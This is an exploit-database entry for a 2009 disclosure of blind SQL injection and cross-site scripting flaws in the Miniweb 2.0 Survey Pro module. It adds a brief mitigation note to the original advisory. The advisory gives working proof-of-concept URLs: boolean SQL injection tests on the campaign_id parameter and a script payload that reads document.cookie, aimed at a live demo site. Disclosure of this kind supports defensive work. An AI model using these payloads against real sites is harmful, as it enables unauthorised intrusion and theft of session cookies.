header-logo
Suggest Exploit
vendor:
Miniweb 2.0
by:
Moudi
8,8
CVSS
HIGH
Blind SQL Injection and XSS
89, 79
CWE
Product Name: Miniweb 2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: YES
Related CWE: N/A
CPE: a:miniweb:miniweb_2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Remote Vulnerabilities

Miniweb 2.0 Module Survey Pro is vulnerable to Blind SQL Injection and XSS. An attacker can exploit this vulnerability by sending a malicious payload in the 'campaign_id' parameter of the 'index.php' page. For Blind SQL Injection, the attacker can send a payload like '1 and 1=2' to check if the query is true or false. For XSS, the attacker can send a malicious payload like '<script>alert(document.cookie)</script>' to execute the script in the victim's browser.

Mitigation:

Input validation should be done to prevent malicious payloads from being sent to the application. Also, the application should be updated to the latest version.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] Miniweb 2.0 Module Survey Pro (bSQL/XSS) Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ Miniweb 2.0 ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.miniweb2.com/index.php?module=sitebuilder&sitebuilder_id=17  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ $250.00 ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/index.php?task=results&campaign_id=[BLIND]

[»] http://miniweb2.com/moduledemo/surveypro/index.php?task=results&campaign_id=1 and 1=1 <= TRUE
[»] http://miniweb2.com/moduledemo/surveypro/index.php?task=results&campaign_id=1 and 1=2 <= FALSE

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/index.php/[XSS]

[»] http://miniweb2.com/moduledemo/surveypro/index.php/"><script>alert(document.cookie);</script>

Note: have some other XSS on index.php ..

Author: Moudi

###########################################################################

# milw0rm.com [2009-08-03]